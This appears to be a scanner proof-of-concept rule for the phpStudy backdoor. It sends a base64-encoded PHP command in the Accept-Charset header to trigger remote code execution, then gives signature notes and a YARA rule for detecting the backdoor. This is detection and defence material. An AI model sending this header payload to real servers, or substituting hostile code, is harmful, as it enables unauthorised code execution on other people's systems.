name: poc-yaml-phpstudy-backdoor-rce
rules:
- method: GET
path: /index.php
headers:
Accept-Encoding: 'gzip,deflate'
Accept-Charset: cHJpbnRmKG1kNSg0NTczMTM0NCkpOw==
follow_redirects: false
expression: |
body.bcontains(b'a5952fb670b54572bcec7440a554633e')
detail:
author: 17bdw
Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4"
vuln_url: "php_xmlrpc.dll"
links:
- https://www.freebuf.com/column/214946.html
网络特征
Accept-Encoding:gzip,deflate 少一个空格
Accept-Charset:为Base64编码
文件特征
特征一、
%s;@eval(%s('%s')); 25 73 3B 40 65 76 61 6C 28 25 73 28 27 25 73 27
29 29 3B
特征二、
@eval(%s('%s')); 40 65 76 61 6C 28 25 73 28 27 25 73 27 29 29 3B
rule PhpStudybackdoor
{
meta:
filetype=" PhpStudybackdoor "
description=" PhpStudybackdoor check"
strings:
$a1 = "@eval(%s('%s'));"
$a2 =”%s;@eval(%s('%s'));”
condition:
any of ($a*)
}
